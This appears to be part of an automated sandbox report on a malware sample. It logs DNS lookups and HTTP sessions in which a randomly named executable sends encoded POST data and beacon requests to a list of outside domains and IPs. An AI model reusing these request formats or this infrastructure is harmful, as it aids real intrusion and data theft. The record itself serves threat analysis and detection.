Oct 24, 2024 08:02:27.499429941 CEST | 1.1.1.1 | 192.168.2.4 | 0x6441 | No error (0) | 40wxd.top | | 206.119.82.134 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:41.279706001 CEST | 1.1.1.1 | 192.168.2.4 | 0x82b1 | No error (0) | www.vasehub.xyz | | 162.213.249.216 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:02:55.426300049 CEST | 1.1.1.1 | 192.168.2.4 | 0x2d02 | No error (0) | www.coffee-and-blends.info | | 217.160.0.231 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:03:09.817275047 CEST | 1.1.1.1 | 192.168.2.4 | 0x531 | No error (0) | www.tmstore.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 08:03:09.817275047 CEST | 1.1.1.1 | 192.168.2.4 | 0x531 | No error (0) | dns.ladipage.com | | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:03:09.817275047 CEST | 1.1.1.1 | 192.168.2.4 | 0x531 | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:03:24.461066961 CEST | 1.1.1.1 | 192.168.2.4 | 0xbf40 | No error (0) | www.softillery.info | softillery.info | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 08:03:24.461066961 CEST | 1.1.1.1 | 192.168.2.4 | 0xbf40 | No error (0) | softillery.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:03:24.461066961 CEST | 1.1.1.1 | 192.168.2.4 | 0xbf40 | No error (0) | softillery.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:03:38.776810884 CEST | 1.1.1.1 | 192.168.2.4 | 0xc035 | Name error (3) | www.gemtastic.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:03:47.183788061 CEST | 1.1.1.1 | 192.168.2.4 | 0x14fc | No error (0) | www.nad5.shop | | 156.226.22.233 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:01.195727110 CEST | 1.1.1.1 | 192.168.2.4 | 0x4245 | No error (0) | www.luxe.guru | | 52.20.84.62 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:14.651712894 CEST | 1.1.1.1 | 192.168.2.4 | 0x397c | No error (0) | www.digitalbloom.info | digitalbloom.info | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 08:04:14.651712894 CEST | 1.1.1.1 | 192.168.2.4 | 0x397c | No error (0) | digitalbloom.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:14.651712894 CEST | 1.1.1.1 | 192.168.2.4 | 0x397c | No error (0) | digitalbloom.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:29.255003929 CEST | 1.1.1.1 | 192.168.2.4 | 0x884f | No error (0) | www.amitayush.digital | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 08:04:29.255003929 CEST | 1.1.1.1 | 192.168.2.4 | 0x884f | No error (0) | ghs.googlehosted.com | | 142.250.186.83 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:43.077860117 CEST | 1.1.1.1 | 192.168.2.4 | 0x5776 | No error (0) | www.moritynomxd.xyz | | 172.81.61.224 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:56.432395935 CEST | 1.1.1.1 | 192.168.2.4 | 0xeb83 | No error (0) | www.tukaari.shop | tukaari.shop | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 08:04:56.432395935 CEST | 1.1.1.1 | 192.168.2.4 | 0xeb83 | No error (0) | tukaari.shop | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 08:04:56.432395935 CEST | 1.1.1.1 | 192.168.2.4 | 0xeb83 | No error (0) | tukaari.shop | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
• www.specialgift.asia
• www.filelabel.info
• www.multileveltravel.world
• www.40wxd.top
• www.vasehub.xyz
• www.coffee-and-blends.info
• www.tmstore.click
• www.softillery.info
• www.nad5.shop
• www.luxe.guru
• www.digitalbloom.info
• www.amitayush.digital
• www.moritynomxd.xyz
• www.tukaari.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 35.156.117.131 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:01:35.048039913 CEST | 525 | OUT | GET /s7e8/?kf-HBx=Qf5nKOHOS6pOo2hqHNTD4NLxMOybGOQpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneAsTSYMh6rYvgLLbq+jq88smW47nOX2gz0M=&oFA=_z5x9B5 HTTP/1.1
Host: www.specialgift.asia
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Oct 24, 2024 08:01:36.388943911 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Thu, 24 Oct 2024 06:01:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2088
Connection: close
Vary: Accept-Encoding
Status: 404 Not Found
X-Request-Id: f111254e20741f3ff67fadeaa7901cf1
X-Runtime: 0.045698
Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 [TRUNCATED]
Data Ascii: <html> <head> <title>Page not found - Strikingly</title> <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <link href='https://fonts.googleapis.com/css?family=Montserrat|Open+Sans' rel='stylesheet' type='text/css'> <link href='//assets.strikingly.com/assets/404-styles.css' rel='stylesheet' type='text/css'> ...[if lte IE 7]> <style> .wide { padding-top: 160px; } </style> <![endif]--> <script type="text/javascript"> // Google Analytics (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-25124444-6', 'auto'); ga('set', 'anonymizeIp
Oct 24, 2024 08:01:36.388976097 CEST | 1130 | IN | Data Raw: 27 2c 20 74 72 75 65 29 3b 0a 20 20 20 20 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 2c 20 7b 20 27 61 6e 6f 6e 79 6d 69 7a 65 49 70 27 3a 20 74 72 75 65 20 7d 29 3b 0a 20 20 20 20 2f 2f 20 45 6e 64 20 47 6f 6f 67 6c 65
                                                                                                                                  Data Ascii: ', true); ga('send', 'pageview', { 'anonymizeIp': true }); // End Google Analytics </script> </head> <body> <div class='bg-logo'></div> <div class='wide light-text'> <div class='col2'> <h1> PAGE NOT FOUN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:01:51.624667883 CEST | 796 | OUT | POST /lclg/ HTTP/1.1
Host: www.filelabel.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.filelabel.info
Referer: http://www.filelabel.info/lclg/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 2f 72 32 30 6b 4c 6f 57 52 4c 6d 7a 37 4b 4c 6c 66 47 69 68 6c 70 57 6f 78 67 5a 57 4d 76 77 67 7a 6d 38 39 66 47 75 51 6f 51 66 72 72 69 4d 73 4a 51 45 46 6c 58 7a 45 65 43 68 46 6c 5a 48 37 63 37 35 75 4d 48 4c 38 46 30 75 44 6e 41 73 4f 75 66 4b 66 66 72 6d 57 62 77 61 4a 50 70 77 6a 45 61 55 58 52 67 74 30 6e 5a 39 73 51 59 46 58 4e 53 4f 48 41 76 56 39 35 6c 62 42 72 46 77 66 4d 50 79 74 71 77 50 4e 31 37 77 37 51 6b 49 67 49 73 56 2b 54 58 72 30 67 6e 37 43 39 55 79 4a 43 79 2b 43 67 48 35 69 62 34 47 56 49 67 30 41 55 4d 75 6f 67 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=nElwp91d2c4kZ/r20kLoWRLmz7KLlfGihlpWoxgZWMvwgzm89fGuQoQfrriMsJQEFlXzEeChFlZH7c75uMHL8F0uDnAsOufKffrmWbwaJPpwjEaUXRgt0nZ9sQYFXNSOHAvV95lbBrFwfMPytqwPN17w7QkIgIsV+TXr0gn7C9UyJCy+CgH5ib4GVIg0AUMuog==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49743 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:01:54.184232950 CEST | 816 | OUT | POST /lclg/ HTTP/1.1
Host: www.filelabel.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.filelabel.info
Referer: http://www.filelabel.info/lclg/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 63 6a 32 79 33 54 6f 42 68 4c 6c 32 37 4b 4c 76 2f 47 6d 68 6c 6c 57 6f 77 56 43 57 2b 37 77 68 52 75 38 2b 65 47 75 46 6f 51 66 68 4c 69 4a 7a 5a 51 4e 46 6c 61 54 45 62 69 68 46 6c 4e 48 37 64 4c 35 75 64 48 49 39 56 30 57 49 48 41 71 44 4f 66 4b 66 66 72 6d 57 61 55 77 4a 50 78 77 6a 30 4b 55 46 7a 59 71 39 48 5a 2b 72 51 59 46 54 4e 53 4b 48 41 76 6e 39 34 70 39 42 6f 39 77 66 4f 58 79 74 2b 6b 4d 45 31 37 32 30 77 6c 76 76 59 70 6a 7a 52 6d 39 79 53 58 47 4d 75 38 67 4d 45 6a 6b 54 52 6d 75 77 62 63 31 49 50 70 41 4e 58 78 6e 7a 6c 54 47 4b 41 70 53 48 72 70 7a 34 4d 5a 76 4c 39 45 49 70 65 73 3d
                                                                                                                                  Data Ascii: kf-HBx=nElwp91d2c4kZcj2y3ToBhLl27KLv/GmhllWowVCW+7whRu8+eGuFoQfhLiJzZQNFlaTEbihFlNH7dL5udHI9V0WIHAqDOfKffrmWaUwJPxwj0KUFzYq9HZ+rQYFTNSKHAvn94p9Bo9wfOXyt+kME1720wlvvYpjzRm9ySXGMu8gMEjkTRmuwbc1IPpANXxnzlTGKApSHrpz4MZvL9EIpes=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49746 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:01:56.743837118 CEST | 10898 | OUT | POST /lclg/ HTTP/1.1
Host: www.filelabel.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.filelabel.info
Referer: http://www.filelabel.info/lclg/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 63 6a 32 79 33 54 6f 42 68 4c 6c 32 37 4b 4c 76 2f 47 6d 68 6c 6c 57 6f 77 56 43 57 2b 44 77 67 6b 36 38 2b 39 2b 75 44 59 51 66 74 72 69 49 7a 5a 52 50 46 6c 79 66 45 62 76 63 46 6d 31 48 34 2b 44 35 36 2f 2f 49 30 56 30 57 56 58 41 76 4f 75 65 58 66 66 37 69 57 62 6b 77 4a 50 78 77 6a 32 43 55 41 52 67 71 37 48 5a 39 73 51 59 4a 58 4e 53 79 48 41 32 53 39 34 38 41 42 59 64 77 52 4f 48 79 6f 4e 4d 4d 50 31 37 30 7a 77 6c 33 76 5a 56 77 7a 52 71 48 79 53 50 6f 4d 74 67 67 4f 41 2b 4c 44 51 47 2b 72 70 4d 34 51 49 56 46 45 47 42 52 30 55 76 59 42 52 4e 50 53 2f 5a 7a 77 4f 6f 36 59 50 51 64 77 4f 75 52 79 35 2f 76 67 38 34 71 68 41 78 63 71 75 48 48 67 56 42 51 44 52 64 67 54 34 52 79 32 50 62 67 38 52 78 48 71 38 65 61 76 52 38 4e 79 48 67 47 6e 67 37 6b 5a 58 57 73 4d 37 73 54 6a 68 38 43 51 44 72 45 36 30 70 47 6a 30 5a 42 59 77 56 62 64 6f 71 6a 4c 51 43 56 34 76 6c 44 51 74 62 43 69 35 2f 36 6e 2f 41 68 2f 31 4b 61 4c 54 5a 5a 67 70 55 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=nElwp91d2c4kZcj2y3ToBhLl27KLv/GmhllWowVCW+Dwgk68+9+uDYQftriIzZRPFlyfEbvcFm1H4+D56//I0V0WVXAvOueXff7iWbkwJPxwj2CUARgq7HZ9sQYJXNSyHA2S948ABYdwROHyoNMMP170zwl3vZVwzRqHySPoMtggOA+LDQG+rpM4QIVFEGBR0UvYBRNPS/ZzwOo6YPQdwOuRy5/vg84qhAxcquHHgVBQDRdgT4Ry2Pbg8RxHq8eavR8NyHgGng7kZXWsM7sTjh8CQDrE60pGj0ZBYwVbdoqjLQCV4vlDQtbCi5/6n/Ah/1KaLTZZgpU8LZiE8dCJ3/DwR/KlK87/gDzr3ALQMCUnBjDCz2vkKxD+FZFbDUKtkMlXDDC5y5Gac9xv7qgrFJ/w7oSlXXoHehGHt251MYi7l+qQdiLIOCyMvYgXSrZMY8PPaVH/KodufcIxWQPPe1Oax0AQw8ym9GzERQVEZZsO2Q9AwGJmMlHbTW/ptscpuWPQ32YtF/RLdySmhA1R0KhPbgulRgf/xF4HRXQ0TvxOCHMvhxGXAzH4uRpAjKnkSXJn00ZPyiwPIpZk2fATU4x3cJ1JMFXBV09gcc/MVYYSPqKWQUXtTqrb+tJKwQ178MWmq4XNIxBaj4OfZbonraBMe502CXZp/y/DKdBzkcLiYrTG+08YKzm2RL1Jx9Th0kwEfrXbHfFLBqCLw/hlH1MvV0WzBw+nXYghNoa6Z90OqaNK6kzthHpHkmXoyLkO/BV0DVh17Ug3w7qJW2TSKrnXVIRPhJuYca8E2+6Ic5Q57xnb92vssQ+fmWNBceSDV3oKrdFjUtp1nTacwDNrjDbINsx2erg4HxgXPHaDZcn8dUjo/0HJY7ltXG+rG8xutB3DzIXlLhSQ8PHK+yzs3QQ3lTrA+s61I2QshZgfPG/aCc0BJgaUnKPO2ldkEbEa0dudkUcSrexkmNl+y+ghUjQlb0kxIEIvY+Dh+XME4oGvP [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49752 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:01:59.444020987 CEST | 523 | OUT | GET /lclg/?kf-HBx=qGNQqN428OgBR9iKpkadQRykwt+HrKy+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkGEuIwUpZoXbB9LzMpYZI6R6lH7jDDsD7jY=&oFA=_z5x9B5 HTTP/1.1
Host: www.filelabel.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Oct 24, 2024 08:02:00.058722973 CEST | 394 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 24 Oct 2024 06:01:59 GMT
Content-Type: text/html
Content-Length: 254
Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 66 2d 48 42 78 3d 71 47 4e 51 71 4e 34 32 38 4f 67 42 52 39 69 4b 70 6b 61 64 51 52 79 6b 77 74 2b 48 72 4b 79 2b 69 31 4a 39 70 78 56 66 5a 38 4b 2b 75 77 6d 72 38 38 2b 31 61 74 70 4d 72 61 36 74 6e 49 6c 4c 4f 6a 53 35 49 2b 37 66 65 45 74 66 69 2f 4f 6d 77 76 2f 72 6b 47 45 75 49 77 55 70 5a 6f 58 62 42 39 4c 7a 4d 70 59 5a 49 36 52 36 6c 48 37 6a 44 44 73 44 37 6a 59 3d 26 6f 46 41 3d 5f 7a 35 78 39 42 35 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kf-HBx=qGNQqN428OgBR9iKpkadQRykwt+HrKy+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkGEuIwUpZoXbB9LzMpYZI6R6lH7jDDsD7jY=&oFA=_z5x9B5"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49808 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:02:13.601144075 CEST | 820 | OUT | POST /ou1g/ HTTP/1.1
Host: www.multileveltravel.world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.multileveltravel.world
Referer: http://www.multileveltravel.world/ou1g/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6b 34 6e 65 47 55 35 4c 72 2f 48 45 2b 64 51 6f 70 4a 4a 67 59 73 6d 76 50 56 62 43 62 38 67 4e 53 35 49 78 2f 73 32 59 32 6c 37 31 31 58 2b 6d 4f 72 65 68 61 58 55 66 68 47 6c 67 78 74 34 57 45 41 45 79 4e 62 63 42 73 66 6e 6f 73 62 41 48 72 35 59 37 73 44 71 64 58 45 72 69 68 59 45 7a 43 75 45 34 51 4d 76 36 62 30 62 68 32 44 2b 56 79 6d 79 77 39 79 68 7a 6d 4c 55 6d 47 46 68 66 72 55 67 78 75 58 41 69 6e 36 4f 78 34 4d 52 42 6c 52 73 47 56 6f 6d 59 61 54 73 50 54 68 45 71 32 51 45 33 2b 56 69 4c 4b 34 63 6c 49 47 46 58 53 37 2b 45 6e 55 38 77 69 43 33 66 31 62 34 64 78 67 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=k4neGU5Lr/HE+dQopJJgYsmvPVbCb8gNS5Ix/s2Y2l711X+mOrehaXUfhGlgxt4WEAEyNbcBsfnosbAHr5Y7sDqdXErihYEzCuE4QMv6b0bh2D+Vymyw9yhzmLUmGFhfrUgxuXAin6Ox4MRBlRsGVomYaTsPThEq2QE3+ViLK4clIGFXS7+EnU8wiC3f1b4dxg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49824 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:02:16.141700983 CEST | 840 | OUT | POST /ou1g/ HTTP/1.1
Host: www.multileveltravel.world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.multileveltravel.world
Referer: http://www.multileveltravel.world/ou1g/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6b 34 6e 65 47 55 35 4c 72 2f 48 45 38 39 67 6f 76 72 68 67 4e 38 6d 73 46 31 62 43 4a 38 67 4a 53 35 55 78 2f 74 79 49 33 54 54 31 31 31 6d 6d 50 70 32 68 62 58 55 66 70 6d 6c 76 38 4e 34 64 45 41 4a 53 4e 61 67 42 73 66 7a 6f 73 62 77 48 6f 4b 77 34 74 54 71 66 4d 30 72 73 38 6f 45 7a 43 75 45 34 51 4d 72 63 62 33 72 68 32 7a 4f 56 7a 45 4b 7a 30 53 68 77 6c 4c 55 6d 43 46 68 54 72 55 67 54 75 55 46 31 6e 34 47 78 34 4e 68 42 6b 41 73 46 4d 59 6d 65 45 54 73 59 54 41 46 63 2b 6a 4a 62 7a 6a 37 70 4c 49 63 6e 41 67 55 4e 44 4b 66 54 31 55 59 44 2f 46 2b 72 34 59 46 55 71 67 44 47 4a 7a 6d 66 31 5a 51 45 30 68 4f 43 74 4b 47 33 55 2b 59 3d
                                                                                                                                  Data Ascii: kf-HBx=k4neGU5Lr/HE89govrhgN8msF1bCJ8gJS5Ux/tyI3TT111mmPp2hbXUfpmlv8N4dEAJSNagBsfzosbwHoKw4tTqfM0rs8oEzCuE4QMrcb3rh2zOVzEKz0ShwlLUmCFhTrUgTuUF1n4Gx4NhBkAsFMYmeETsYTAFc+jJbzj7pLIcnAgUNDKfT1UYD/F+r4YFUqgDGJzmf1ZQE0hOCtKG3U+Y=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49840 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:02:18.692248106 CEST | 10922 | OUT | POST /ou1g/ HTTP/1.1
Host: www.multileveltravel.world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.multileveltravel.world
Referer: http://www.multileveltravel.world/ou1g/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 6b 34 6e 65 47 55 35 4c 72 2f 48 45 38 39 67 6f 76 72 68 67 4e 38 6d 73 46 31 62 43 4a 38 67 4a 53 35 55 78 2f 74 79 49 33 54 62 31 31 41 79 6d 50 50 2b 68 4a 6e 55 66 71 6d 6c 2f 38 4e 34 4d 45 41 42 65 4e 61 73 52 73 63 4c 6f 39 4a 34 48 74 37 77 34 34 44 71 66 45 55 72 68 68 59 45 44 43 75 55 38 51 4d 37 63 62 33 72 68 32 78 57 56 6a 6d 79 7a 79 53 68 7a 6d 4c 55 71 47 46 68 2f 72 55 6f 35 75 58 6f 49 6d 4d 79 78 34 74 78 42 70 53 45 46 54 6f 6d 63 51 7a 74 64 54 46 64 50 2b 6a 6c 68 7a 6a 6d 45 4c 4b 41 6e 44 6e 56 37 48 61 58 76 33 43 63 41 72 56 54 4c 77 62 70 4a 6c 77 6e 38 5a 43 43 6b 67 4b 6b 66 73 6d 6d 4e 30 59 75 69 50 35 41 57 55 77 69 6f 6d 33 30 2b 43 52 47 64 6a 53 57 4d 7a 32 36 34 44 51 7a 6b 38 72 33 69 39 56 6f 78 58 4c 78 4a 36 30 6a 4c 78 34 31 61 57 5a 35 4e 71 51 38 66 35 59 2b 6c 34 30 38 55 54 77 42 31 61 53 47 63 66 52 30 43 4a 31 37 4e 49 5a 73 61 4b 79 4c 6e 33 37 41 53 6d 77 30 7a 59 37 66 33 4c 46 75 44 35 53 36 54 6c 35 57 4d 77 32 67 6f 76 36 67 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49851 | 3.33.130.190 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:02:21.235765934 CEST | 531 | OUT | GET /ou1g/?kf-HBx=p6P+FgoGiP/G4Ng2k4kydfL9CEjREuwmc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4guZJ1Pjn+I9YPEKQsPJSCqhxwn7206Dyyk=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.multileveltravel.world
